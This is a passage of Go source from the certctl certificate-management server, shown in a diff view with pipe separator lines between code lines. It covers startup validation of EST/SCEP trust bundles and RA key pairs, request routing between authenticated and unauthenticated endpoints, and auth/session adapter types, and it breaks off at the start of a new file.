if block == nil {
|
|
||||||
break
|
|
||||||
}
|
|
||||||
if block.Type != "CERTIFICATE" {
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
cert, err := x509.ParseCertificate(block.Bytes)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("parse MTLS trust bundle cert: %w (path=%s)", err, bundlePath)
|
|
||||||
}
|
|
||||||
if now.After(cert.NotAfter) {
|
|
||||||
return nil, fmt.Errorf("MTLS trust bundle cert expired at %s (subject=%q, path=%s) — replace before restart",
|
|
||||||
cert.NotAfter.Format(time.RFC3339), cert.Subject.CommonName, bundlePath)
|
|
||||||
}
|
|
||||||
pool.AddCert(cert)
|
|
||||||
count++
|
|
||||||
}
|
|
||||||
if count == 0 {
|
|
||||||
return nil, fmt.Errorf("MTLS trust bundle contained no CERTIFICATE PEM blocks (path=%s)", bundlePath)
|
|
||||||
}
|
|
||||||
return pool, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// preflightESTMTLSClientCATrustBundle validates a per-profile EST mTLS
|
|
||||||
// client-CA trust bundle and returns a SIGHUP-reloadable holder.
|
|
||||||
//
|
|
||||||
// EST RFC 7030 hardening master bundle Phase 2.5.
|
|
||||||
//
|
|
||||||
// Mirrors preflightSCEPMTLSTrustBundle's checks (file exists, parses as
|
|
||||||
// PEM, ≥1 cert, none expired) but returns a *trustanchor.Holder rather
|
|
||||||
// than a raw *x509.CertPool — the EST handler stores the holder so a
|
|
||||||
// SIGHUP rotates the trust bundle live without a server restart, exactly
|
|
||||||
// the way the Intune trust anchor rotation works (Phase 8.5 of the SCEP
|
|
||||||
// bundle). The handler-side .Pool() accessor on the holder rebuilds an
|
|
||||||
// x509.CertPool from the current snapshot for each Verify call.
|
|
||||||
//
|
|
||||||
// Uses the shared internal/trustanchor.LoadBundle (extracted in EST
|
|
||||||
// hardening Phase 2.1 from the original Intune-only path) so the EST
|
|
||||||
// + Intune callers exercise the same loader semantics — empty bundle
|
|
||||||
// rejected, expired cert rejected with subject in error message,
|
|
||||||
// non-CERTIFICATE PEM blocks tolerated.
|
|
||||||
func preflightESTMTLSClientCATrustBundle(enabled bool, pathID, bundlePath string, logger *slog.Logger) (*trustanchor.Holder, error) {
|
|
||||||
if !enabled {
|
|
||||||
return nil, nil
|
|
||||||
}
|
|
||||||
if bundlePath == "" {
|
|
||||||
return nil, fmt.Errorf("EST profile (PathID=%q) MTLS enabled but trust bundle path empty: "+
|
|
||||||
"set CERTCTL_EST_PROFILE_<NAME>_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH to a PEM file "+
|
|
||||||
"containing the bootstrap-CA certs the operator allows to enroll", pathID)
|
|
||||||
}
|
|
||||||
holder, err := trustanchor.New(bundlePath, logger)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("EST profile (PathID=%q) MTLS trust bundle preflight: %w", pathID, err)
|
|
||||||
}
|
|
||||||
holder.SetLabelForLog(fmt.Sprintf("EST mTLS client CA bundle (PathID=%q)", pathID))
|
|
||||||
return holder, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// preflightSCEPIntuneTrustAnchor validates a per-profile Microsoft Intune
|
|
||||||
// Certificate Connector signing-cert trust bundle.
|
|
||||||
//
|
|
||||||
// SCEP RFC 8894 + Intune master bundle Phase 8.2.
|
|
||||||
//
|
|
||||||
// No-op when this profile has Intune disabled (the common case for
|
|
||||||
// non-Intune SCEP deploys). When enabled:
|
|
||||||
//
|
|
||||||
// 1. Path is non-empty (Validate() refuse covers this too; we re-check
|
|
||||||
// here so the caller can os.Exit(1) with the specific PathID in the
|
|
||||||
// log line).
|
|
||||||
// 2. File exists + readable.
|
|
||||||
// 3. PEM-decodes to ≥1 CERTIFICATE block (intune.LoadTrustAnchor enforces
|
|
||||||
// this and skips non-CERTIFICATE blocks like accidentally-pasted
|
|
||||||
// priv-key blocks).
|
|
||||||
// 4. None of the bundled certs is past NotAfter — an expired Intune
|
|
||||||
// trust anchor would silently reject every Connector challenge at
|
|
||||||
// runtime, which is a much worse failure mode than failing fast at
|
|
||||||
// boot. intune.LoadTrustAnchor enforces this and surfaces the subject
|
|
||||||
// CN in the error message so the operator knows which cert to rotate.
|
|
||||||
//
|
|
||||||
// On success returns the freshly-built *intune.TrustAnchorHolder ready to
|
|
||||||
// inject into the per-profile SCEPService via SetIntuneIntegration. The
|
|
||||||
// holder also installs the SIGHUP watcher (started by the caller).
|
|
||||||
func preflightSCEPIntuneTrustAnchor(enabled bool, pathID, path string, logger *slog.Logger) (*intune.TrustAnchorHolder, error) {
|
|
||||||
if !enabled {
|
|
||||||
return nil, nil
|
|
||||||
}
|
|
||||||
// pathIDLabel renders the empty-string PathID as "<root>" so the
|
|
||||||
// operator's boot-log error doesn't read like a missing variable.
|
|
||||||
pathIDLabel := pathID
|
|
||||||
if pathIDLabel == "" {
|
|
||||||
pathIDLabel = "<root>"
|
|
||||||
}
|
|
||||||
if path == "" {
|
|
||||||
return nil, fmt.Errorf("SCEP profile (PathID=%q) INTUNE enabled but trust anchor path empty: "+
|
|
||||||
"set CERTCTL_SCEP_PROFILE_<NAME>_INTUNE_CONNECTOR_CERT_PATH to a PEM bundle "+
|
|
||||||
"of the Microsoft Intune Certificate Connector's signing certs", pathIDLabel)
|
|
||||||
}
|
|
||||||
holder, err := intune.NewTrustAnchorHolder(path, logger)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("SCEP profile (PathID=%q) INTUNE trust anchor load failed: %w (path=%s)", pathIDLabel, err, path)
|
|
||||||
}
|
|
||||||
return holder, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// loadSCEPRAPair reads the RA cert PEM + key PEM and returns the parsed
|
|
||||||
// x509.Certificate + crypto.PrivateKey ready for the SCEP handler's RFC
|
|
||||||
// 8894 path. Called AFTER preflightSCEPRACertKey passed; failures here
|
|
||||||
// indicate a TOCTOU race or a filesystem change between preflight and
|
|
||||||
// the load (rare).
|
|
||||||
//
|
|
||||||
// Cert PEM may carry a chain (CA + RA + intermediate); we use the FIRST
|
|
||||||
// CERTIFICATE block, matching the RFC 8894 §3.5.1 single-cert convention
|
|
||||||
// for the GetCACert response.
|
|
||||||
func loadSCEPRAPair(certPath, keyPath string) (*x509.Certificate, crypto.PrivateKey, error) {
|
|
||||||
certPEM, err := os.ReadFile(certPath)
|
|
||||||
if err != nil {
|
|
||||||
return nil, nil, fmt.Errorf("read RA cert: %w", err)
|
|
||||||
}
|
|
||||||
keyPEM, err := os.ReadFile(keyPath)
|
|
||||||
if err != nil {
|
|
||||||
return nil, nil, fmt.Errorf("read RA key: %w", err)
|
|
||||||
}
|
|
||||||
pair, err := tls.X509KeyPair(certPEM, keyPEM)
|
|
||||||
if err != nil {
|
|
||||||
return nil, nil, fmt.Errorf("parse RA pair: %w", err)
|
|
||||||
}
|
|
||||||
if len(pair.Certificate) == 0 {
|
|
||||||
return nil, nil, fmt.Errorf("RA cert PEM contained no certificate blocks")
|
|
||||||
}
|
|
||||||
leaf, err := x509.ParseCertificate(pair.Certificate[0])
|
|
||||||
if err != nil {
|
|
||||||
return nil, nil, fmt.Errorf("parse RA cert: %w", err)
|
|
||||||
}
|
|
||||||
return leaf, pair.PrivateKey, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// preflightSCEPRACertKey validates the RA cert/key pair the RFC 8894 SCEP
|
|
||||||
// path requires. Mirrors preflightSCEPChallengePassword's no-op-when-disabled
|
|
||||||
// pattern; otherwise the checks are:
|
|
||||||
//
|
|
||||||
// 1. Both paths are non-empty (the Validate() refuse covers this too,
|
|
||||||
// but preflight reports the specific failure mode + os.Exit(1) so the
|
|
||||||
// operator sees a clear log line in addition to the config error).
|
|
||||||
// 2. The key file mode is 0600 (refuse world-/group-readable RA key —
|
|
||||||
// defense-in-depth against credential leak via a misconfigured
|
|
||||||
// deploy that leaves /etc/certctl/scep/*.key as 0644).
|
|
||||||
// 3. Cert PEM parses to exactly one x509.Certificate.
|
|
||||||
// 4. Key PEM parses to a Go crypto.Signer (RSA or ECDSA — RFC 8894
|
|
||||||
// §3.5.2 advertises those as the CMS-compatible algorithms).
|
|
||||||
// 5. The cert's PublicKey matches the key's Public() — refuses pairs
|
|
||||||
// accidentally swapped between profiles in a multi-profile config.
|
|
||||||
// 6. The cert's NotAfter is in the future — an expired RA cert would
|
|
||||||
// fail TLS handshake on EnvelopedData decryption per RFC 5652.
|
|
||||||
//
|
|
||||||
// Each check returns a wrapped error; the caller (main) is responsible for
|
|
||||||
// translating to a structured slog.Error + os.Exit(1) so the helper stays
|
|
||||||
// unit-testable without booting the full server.
|
|
||||||
func preflightSCEPRACertKey(enabled bool, raCertPath, raKeyPath string) error {
|
|
||||||
if !enabled {
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
if raCertPath == "" || raKeyPath == "" {
|
|
||||||
return fmt.Errorf("SCEP enabled but RA pair missing: " +
|
|
||||||
"set CERTCTL_SCEP_RA_CERT_PATH + CERTCTL_SCEP_RA_KEY_PATH " +
|
|
||||||
"(RFC 8894 §3.2.2 requires an RA pair so clients can encrypt the " +
|
|
||||||
"CSR to the RA cert and the server can sign the CertRep response)")
|
|
||||||
}
|
|
||||||
|
|
||||||
// File mode check FIRST so a world-readable key never gets read into the
|
|
||||||
// process address space. Ignored on Windows (Stat().Mode() doesn't carry
|
|
||||||
// POSIX bits there); the production deploy is Linux per the Dockerfile.
|
|
||||||
keyInfo, err := os.Stat(raKeyPath)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH stat failed: %w (path=%s)", err, raKeyPath)
|
|
||||||
}
|
|
||||||
mode := keyInfo.Mode().Perm()
|
|
||||||
if mode&0o077 != 0 {
|
|
||||||
return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH has insecure permissions %#o; "+
|
|
||||||
"RA private key must be mode 0600 (owner read/write only) — "+
|
|
||||||
"chmod 0600 %s and restart", mode, raKeyPath)
|
|
||||||
}
|
|
||||||
|
|
||||||
certPEM, err := os.ReadFile(raCertPath)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("CERTCTL_SCEP_RA_CERT_PATH read failed: %w (path=%s)", err, raCertPath)
|
|
||||||
}
|
|
||||||
keyPEM, err := os.ReadFile(raKeyPath)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH read failed: %w (path=%s)", err, raKeyPath)
|
|
||||||
}
|
|
||||||
|
|
||||||
// tls.X509KeyPair validates that the cert + key parse, share an algorithm,
|
|
||||||
// and the cert's PublicKey matches the key's Public() — three of our six
|
|
||||||
// checks in a single stdlib call, so we use it rather than re-implementing.
|
|
||||||
pair, err := tls.X509KeyPair(certPEM, keyPEM)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("RA cert/key pair invalid: %w "+
|
|
||||||
"(cert=%s key=%s) — verify the cert and key are matching halves of "+
|
|
||||||
"the same RA pair, both PEM-encoded, with the cert containing exactly "+
|
|
||||||
"one CERTIFICATE block and the key containing one PRIVATE KEY block",
|
|
||||||
err, raCertPath, raKeyPath)
|
|
||||||
}
|
|
||||||
if len(pair.Certificate) == 0 {
|
|
||||||
// Defensive — tls.X509KeyPair already errors on this, but the contract
|
|
||||||
// for the next x509.ParseCertificate call needs the slice non-empty.
|
|
||||||
return fmt.Errorf("RA cert PEM at %s contains no certificate blocks", raCertPath)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Re-parse the leaf so we can read NotAfter + the public-key alg.
|
|
||||||
leaf, err := x509.ParseCertificate(pair.Certificate[0])
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("RA cert at %s does not parse as x509: %w", raCertPath, err)
|
|
||||||
}
|
|
||||||
if time.Now().After(leaf.NotAfter) {
|
|
||||||
return fmt.Errorf("RA cert at %s expired at %s — "+
|
|
||||||
"generate a fresh RA pair (the SCEP CertRep signature would be "+
|
|
||||||
"rejected by every conformant client)", raCertPath, leaf.NotAfter.Format(time.RFC3339))
|
|
||||||
}
|
|
||||||
|
|
||||||
// CMS-compatible public-key algorithm gate. RFC 8894 §3.5.2 advertises RSA
|
|
||||||
// and AES; the responder cert algorithm pertains to the signature scheme
|
|
||||||
// used on the CertRep, which means the cert's PublicKey must be RSA or
|
|
||||||
// ECDSA. Catches pre-shared Ed25519 dev keys that micromdm/scep clients
|
|
||||||
// reject.
|
|
||||||
switch leaf.PublicKeyAlgorithm {
|
|
||||||
case x509.RSA, x509.ECDSA:
|
|
||||||
// ok — supported by golang.org/x/crypto/ocsp + every SCEP client
|
|
||||||
default:
|
|
||||||
return fmt.Errorf("RA cert at %s uses unsupported public-key algorithm %s — "+
|
|
||||||
"RFC 8894 §3.5.2 CMS signing requires RSA or ECDSA",
|
|
||||||
raCertPath, leaf.PublicKeyAlgorithm)
|
|
||||||
}
|
|
||||||
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// preflightEnrollmentIssuer validates at startup that an EST/SCEP-bound issuer
|
|
||||||
// can actually serve a CA certificate. This closes audit finding L-005:
|
|
||||||
// pre-Bundle-4 the EST/SCEP startup path verified the issuer existed in the
|
|
||||||
// registry but did not verify the issuer TYPE could emit a CA cert. An
|
|
||||||
// operator who bound CERTCTL_EST_ISSUER_ID to an ACME issuer (which does
|
|
||||||
// not have a static CA cert — see internal/connector/issuer/acme/acme.go::
|
|
||||||
// GetCACertPEM returning an explicit error) would boot successfully and
|
|
||||||
// only see failures at the first /est/cacerts request, hiding the misconfig
|
|
||||||
// for hours/days behind a degraded enrollment surface.
|
|
||||||
//
|
|
||||||
// Strategy: call issuerConn.GetCACertPEM(ctx) at startup with a short
|
|
||||||
// timeout. If the issuer can serve a CA cert (local, vault, openssl,
|
|
||||||
// stepca, awsacmpca, etc.), the call succeeds and we proceed. If not
|
|
||||||
// (acme, digicert, sectigo, entrust, googlecas, ejbca, globalsign — most
|
|
||||||
// vendor-CA issuers that hand back chains per-issuance), the call fails
|
|
||||||
// loudly with the connector's own error string, and the caller os.Exit(1)s.
|
|
||||||
//
|
|
||||||
// Returns nil on success, non-nil error suitable for structured logging
|
|
||||||
// + os.Exit(1) by the caller. Caller is responsible for the timeout context.
|
|
||||||
func preflightEnrollmentIssuer(ctx context.Context, protocol, issuerID string, issuerConn service.IssuerConnector) error {
|
|
||||||
if issuerConn == nil {
|
|
||||||
return fmt.Errorf("%s issuer %q: connector is nil", protocol, issuerID)
|
|
||||||
}
|
|
||||||
caCertPEM, err := issuerConn.GetCACertPEM(ctx)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("%s issuer %q: cannot serve CA certificate (%w); "+
|
|
||||||
"choose an issuer type that exposes a static CA chain "+
|
|
||||||
"(local / vault / openssl / stepca / awsacmpca) or disable %s",
|
|
||||||
protocol, issuerID, err, protocol)
|
|
||||||
}
|
|
||||||
if caCertPEM == "" {
|
|
||||||
return fmt.Errorf("%s issuer %q: GetCACertPEM returned empty PEM with no error; "+
|
|
||||||
"choose an issuer type that exposes a static CA chain", protocol, issuerID)
|
|
||||||
}
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// buildFinalHandler builds the outer HTTP dispatch handler that routes incoming
|
|
||||||
// requests to either the authenticated apiHandler chain or the unauthenticated
|
|
||||||
// noAuthHandler chain based on URL path prefix. Extracted from main() so the
|
|
||||||
// dispatch logic can be unit tested without booting the full server stack
|
|
||||||
// (see cmd/server/finalhandler_test.go).
|
|
||||||
//
|
|
||||||
// Dispatch rules (M-001, audit 2026-04-19, option D):
|
|
||||||
//
|
|
||||||
// - /health, /ready, /api/v1/auth/info → no-auth (probes + login detection)
|
|
||||||
// - /api/v1/version → no-auth (U-3 ride-along: build identity for rollout/probes)
|
|
||||||
// - /.well-known/pki/* → no-auth (RFC 5280 CRL, RFC 6960 OCSP)
|
|
||||||
// - /.well-known/est/* → no-auth (RFC 7030 §3.2.3)
|
|
||||||
// - /scep, /scep/* → no-auth (RFC 8894 §3.2, CSR challengePassword)
|
|
||||||
// - /api/v1/* → auth (Bearer token required)
|
|
||||||
// - /assets/* → static file server (dashboard only)
|
|
||||||
// - anything else → SPA index.html fallback (dashboard only)
|
|
||||||
// OR apiHandler (no dashboard)
|
|
||||||
//
|
|
||||||
// EST/SCEP clients (IoT devices, 802.1X supplicants, MDM endpoints, network
|
|
||||||
// appliances) cannot present certctl Bearer tokens, so those endpoints must be
|
|
||||||
// reachable without the Auth middleware. Authentication is instead enforced by
|
|
||||||
// CSR signature verification, profile policy gates, and for SCEP the
|
|
||||||
// challengePassword shared secret (fail-loud gated by preflightSCEPChallengePassword
|
|
||||||
// above).
|
|
||||||
//
|
|
||||||
// webDir must point to a directory containing index.html + assets/ when
|
|
||||||
// dashboardEnabled is true; it is ignored otherwise.
|
|
||||||
func buildFinalHandler(apiHandler, noAuthHandler http.Handler, webDir string, dashboardEnabled bool) http.Handler {
|
|
||||||
var fileServer http.Handler
|
|
||||||
if dashboardEnabled {
|
|
||||||
fileServer = http.FileServer(http.Dir(webDir))
|
|
||||||
}
|
|
||||||
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
|
||||||
path := r.URL.Path
|
|
||||||
|
|
||||||
// Health/ready, auth/info, and version bypass auth middleware.
|
|
||||||
// Health/ready: Docker/K8s health probes don't carry Bearer tokens.
|
|
||||||
// auth/info: React app calls this before login to detect auth mode.
|
|
||||||
// version: U-3 ride-along (cat-u-no_version_endpoint) — rollout
|
|
||||||
// systems and blackbox probes need build identity without a key.
|
|
||||||
if path == "/health" || path == "/ready" || path == "/api/v1/auth/info" || path == "/api/v1/version" {
|
|
||||||
noAuthHandler.ServeHTTP(w, r)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// RFC 5280 CRL and RFC 6960 OCSP live under /.well-known/pki/ and MUST
|
|
||||||
// be served unauthenticated — relying parties (browsers, OpenSSL, OCSP
|
|
||||||
// stapling sidecars, mTLS clients) cannot present certctl Bearer tokens.
|
|
||||||
if strings.HasPrefix(path, "/.well-known/pki") {
|
|
||||||
noAuthHandler.ServeHTTP(w, r)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// RFC 7030 EST endpoints ride the no-auth middleware chain (M-001,
|
|
||||||
// option D, audit 2026-04-19). Trust boundary is CSR signature +
|
|
||||||
// (per EST hardening Phase 2) optional client cert at the handler
|
|
||||||
// layer, not HTTP Bearer. /.well-known/est/cacerts is explicitly
|
|
||||||
// anonymous per RFC 7030 §4.1.1; /.well-known/est-mtls/<PathID>/
|
|
||||||
// (EST hardening Phase 2 sibling route) requires a client cert
|
|
||||||
// gate at the handler layer — both share this prefix gate because
|
|
||||||
// "/.well-known/est-mtls" is itself prefixed by "/.well-known/est".
|
|
||||||
// EST hardening Phase 3's HTTP Basic enrollment-password is a
|
|
||||||
// per-profile handler-layer auth that runs INSIDE the no-auth
|
|
||||||
// middleware chain (since the chain skips the Bearer middleware,
|
|
||||||
// the handler gets to define its own auth contract).
|
|
||||||
if strings.HasPrefix(path, "/.well-known/est") {
|
|
||||||
noAuthHandler.ServeHTTP(w, r)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// RFC 8894 SCEP rides the no-auth chain (M-001, option D). SCEP clients
|
|
||||||
// authenticate via the challengePassword attribute in the PKCS#10 CSR,
|
|
||||||
// not via HTTP Bearer tokens. preflightSCEPChallengePassword refuses to
|
|
||||||
// start the server if SCEP is enabled without a non-empty shared secret.
|
|
||||||
//
|
|
||||||
// SCEP RFC 8894 + Intune master bundle Phase 6.5: the sibling
|
|
||||||
// /scep-mtls[/<pathID>] route also rides the no-auth chain. Its
|
|
||||||
// auth boundary is (a) client cert verified at the TLS layer +
|
|
||||||
// re-verified per-profile at the handler layer, plus (b) the
|
|
||||||
// challenge password — neither is a Bearer token. The /scepxyz
|
|
||||||
// vs /scep-mtls disambiguation: 'xyz' starts with a letter so the
|
|
||||||
// HasPrefix(path, "/scep/") gate doesn't match it; 'mtls' is its
|
|
||||||
// own dedicated prefix gated below to avoid the same overlap.
|
|
||||||
if path == "/scep" || strings.HasPrefix(path, "/scep/") {
|
|
||||||
noAuthHandler.ServeHTTP(w, r)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
if path == "/scep-mtls" || strings.HasPrefix(path, "/scep-mtls/") {
|
|
||||||
noAuthHandler.ServeHTTP(w, r)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// Authenticated API routes — full middleware stack including Auth.
|
|
||||||
if strings.HasPrefix(path, "/api/v1/") {
|
|
||||||
apiHandler.ServeHTTP(w, r)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
if !dashboardEnabled {
|
|
||||||
// No dashboard: everything non-special falls through to the
|
|
||||||
// authenticated handler (preserves pre-M-001 behavior for API-only
|
|
||||||
// deployments).
|
|
||||||
apiHandler.ServeHTTP(w, r)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// Dashboard-present: serve static assets directly, SPA fallback for
|
|
||||||
// everything else.
|
|
||||||
if strings.HasPrefix(path, "/assets/") {
|
|
||||||
fileServer.ServeHTTP(w, r)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
http.ServeFile(w, r, webDir+"/index.html")
|
|
||||||
})
|
|
||||||
}
|
|
||||||
|
|
||||||
// authPermissionCheckerAdapter bridges the typed-string Authorizer
|
|
||||||
// signature (authsvc.Authorizer.CheckPermission takes
|
|
||||||
// authdomain.ActorTypeValue + authdomain.ScopeType) to the plain-string
|
|
||||||
// auth.PermissionChecker interface used by the auth.RequirePermission
|
|
||||||
// middleware factory. Lives in cmd/server so internal/auth doesn't have
|
|
||||||
// to import internal/service/auth + internal/domain/auth (would create
|
|
||||||
// a cycle).
|
|
||||||
type authPermissionCheckerAdapter struct {
|
|
||||||
a *authsvc.Authorizer
|
|
||||||
}
|
|
||||||
|
|
||||||
func (ad authPermissionCheckerAdapter) CheckPermission(
|
|
||||||
ctx context.Context,
|
|
||||||
actorID string,
|
|
||||||
actorType string,
|
|
||||||
tenantID string,
|
|
||||||
permission string,
|
|
||||||
scopeType string,
|
|
||||||
scopeID *string,
|
|
||||||
) (bool, error) {
|
|
||||||
return ad.a.CheckPermission(
|
|
||||||
ctx,
|
|
||||||
actorID,
|
|
||||||
authdomainAlias.ActorTypeValue(actorType),
|
|
||||||
tenantID,
|
|
||||||
permission,
|
|
||||||
authdomainAlias.ScopeType(scopeType),
|
|
||||||
scopeID,
|
|
||||||
)
|
|
||||||
}
|
|
||||||
|
|
||||||
// authCheckResolverAdapter bridges the postgres ActorRoleRepository
|
|
||||||
// (authdomain.ActorTypeValue) to handler.AuthCheckResolver
|
|
||||||
// (domain.ActorType). Lives in cmd/server so the handler layer keeps its
|
|
||||||
// existing import set; the GUI's /v1/auth/check probe round-trips
|
|
||||||
// through this on every page load. Read-only — no caller / no audit row.
|
|
||||||
//
|
|
||||||
// Bundle 1 Phase 3 closure (M1): the equivalent surface area on
|
|
||||||
// /v1/auth/me runs through the service layer's auth.role.list permission
|
|
||||||
// gate, which the GUI may not yet hold during initial render. AuthCheck
|
|
||||||
// has no permission gate (its only requirement is "the request
|
|
||||||
// authenticated"), so the bypass is by design.
|
|
||||||
type authCheckResolverAdapter struct {
|
|
||||||
repo *postgres.ActorRoleRepository
|
|
||||||
}
|
|
||||||
|
|
||||||
func (ad authCheckResolverAdapter) ListRoles(
|
|
||||||
ctx context.Context,
|
|
||||||
actorID string,
|
|
||||||
actorType domain.ActorType,
|
|
||||||
tenantID string,
|
|
||||||
) ([]*authdomainAlias.ActorRole, error) {
|
|
||||||
return ad.repo.ListByActor(ctx, actorID, authdomainAlias.ActorTypeValue(actorType), tenantID)
|
|
||||||
}
|
|
||||||
|
|
||||||
func (ad authCheckResolverAdapter) EffectivePermissions(
|
|
||||||
ctx context.Context,
|
|
||||||
actorID string,
|
|
||||||
actorType domain.ActorType,
|
|
||||||
tenantID string,
|
|
||||||
) ([]repository.EffectivePermission, error) {
|
|
||||||
return ad.repo.EffectivePermissions(ctx, actorID, authdomainAlias.ActorTypeValue(actorType), tenantID)
|
|
||||||
}
|
|
||||||
|
|
||||||
// =============================================================================
|
|
||||||
// sessionMinterAdapter — bridge from *session.Service to oidcsvc.SessionMinter.
|
|
||||||
//
|
|
||||||
// The OIDC service's SessionMinter port (Phase 3) takes a *userdomain.User
|
|
||||||
// + role IDs and returns (cookie, csrf, err). The session.Service's
|
|
||||||
// Create method takes (actorID, actorType, ip, ua) -> *CreateResult.
|
|
||||||
// This adapter unwraps the User into actorID/actorType + reshapes the
|
|
||||||
// return tuple. Lives in cmd/server so the session package doesn't have
|
|
||||||
// to know about user.User and the user package doesn't have to know
|
|
||||||
// about session.CreateResult.
|
|
||||||
// =============================================================================
|
|
||||||
|
|
||||||
type sessionMinterAdapter struct {
|
|
||||||
svc *session.Service
|
|
||||||
}
|
|
||||||
|
|
||||||
func (a *sessionMinterAdapter) MintForUser(
|
|
||||||
ctx context.Context,
|
|
||||||
user *userdomain.User,
|
|
||||||
_ []string, // roleIDs unused at the session-mint layer; the rbac middleware looks them up at request time
|
|
||||||
ip, userAgent string,
|
|
||||||
) (cookieValue, csrfToken string, err error) {
|
|
||||||
if user == nil {
|
|
||||||
return "", "", fmt.Errorf("session mint: user is nil")
|
|
||||||
}
|
|
||||||
res, err := a.svc.Create(ctx, user.ID, string(domain.ActorTypeUser), ip, userAgent)
|
|
||||||
if err != nil {
|
|
||||||
return "", "", err
|
|
||||||
}
|
|
||||||
return res.CookieValue, res.CSRFToken, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// silenceUnusedImports keeps the new oidcsvc + oidcdomain imports load-
|
|
||||||
// bearing in case any file shuffles. Linker dead-code elimination handles
|
|
||||||
// the runtime cost.
|
|
||||||
var (
|
|
||||||
_ = oidcdomain.OIDCProvider{}
|
|
||||||
)
|
|
||||||
|
|
||||||
// =============================================================================
|
|
||||||
// breakglassSessionMinterAdapter — bridge from *session.Service to
|
|
||||||
// breakglass.SessionMinter.
|
|
||||||
//
|
|
||||||
// The break-glass service's SessionMinter port (Phase 7.5) returns
|
|
||||||
// (cookie, csrf, err); the underlying *session.Service.Create returns
|
|
||||||
// *CreateResult. This adapter unwraps the result. Lives in cmd/server
|
|
||||||
// so the breakglass package doesn't have to know about session.Service.
|
|
||||||
// =============================================================================
|
|
||||||
|
|
||||||
type breakglassSessionMinterAdapter struct {
|
|
||||||
svc *session.Service
|
|
||||||
}
|
|
||||||
|
|
||||||
func (a breakglassSessionMinterAdapter) Create(ctx context.Context, actorID, actorType, ip, userAgent string) (string, string, error) {
|
|
||||||
res, err := a.svc.Create(ctx, actorID, actorType, ip, userAgent)
|
|
||||||
if err != nil {
|
|
||||||
return "", "", err
|
|
||||||
}
|
|
||||||
return res.CookieValue, res.CSRFToken, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// RevokeAllForActor — Audit 2026-05-10 HIGH-1 wire. After a break-glass
|
|
||||||
// password rotation or credential removal, every active session for the
|
|
||||||
// target actor must be revoked so a phished-then-rotated credential
|
|
||||||
// doesn't leave the attacker's session live.
|
|
||||||
func (a breakglassSessionMinterAdapter) RevokeAllForActor(ctx context.Context, actorID, actorType string) error {
|
|
||||||
return a.svc.RevokeAllForActor(ctx, actorID, actorType)
|
|
||||||
}
|
|
||||||
|
|
||||||
// oidcProvidersListAdapter bridges the postgres OIDCProviderRepository
|
|
||||||
// to handler.OIDCProvidersListResolver. The handler returns
|
|
||||||
// []*OIDCProviderInfo (id + display_name + login_url) for the public-
|
|
||||||
// safe GUI Login-page payload; the repo returns the full OIDCProvider
|
|
||||||
// row. The adapter projects + maps the login_url shape that
|
|
||||||
// /auth/oidc/login?provider=<id> expects. Auth Bundle 2 Phase 6 /
|
|
||||||
// Category E.
|
|
||||||
type oidcProvidersListAdapter struct {
|
|
||||||
repo repository.OIDCProviderRepository
|
|
||||||
}
|
|
||||||
|
|
||||||
func (a oidcProvidersListAdapter) List(ctx context.Context, tenantID string) ([]*handler.OIDCProviderInfo, error) {
|
|
||||||
provs, err := a.repo.List(ctx, tenantID)
|
|
||||||
if err != nil {
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
out := make([]*handler.OIDCProviderInfo, 0, len(provs))
|
|
||||||
for _, p := range provs {
|
|
||||||
// Audit 2026-05-10 MED-9 closure — filter disabled providers
|
|
||||||
// at the adapter so the LoginPage's "Sign in with X" buttons
|
|
||||||
// don't render for offline IdPs. The HandleAuthRequest
|
|
||||||
// service-layer ErrProviderDisabled check is the
|
|
||||||
// defense-in-depth guard for direct API / MCP / CLI callers.
|
|
||||||
if !p.Enabled {
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
out = append(out, &handler.OIDCProviderInfo{
|
|
||||||
ID: p.ID,
|
|
||||||
DisplayName: p.Name,
|
|
||||||
LoginURL: "/auth/oidc/login?provider=" + p.ID,
|
|
||||||
})
|
|
||||||
}
|
|
||||||
return out, nil
|
|
||||||
}
|
|
||||||
|
|||||||
@@ -0,0 +1,209 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"database/sql"
|
||||||
|
"log/slog"
|
||||||
|
"os"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/config"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository/postgres"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 8b (2026-05-14): the deferred half of
|
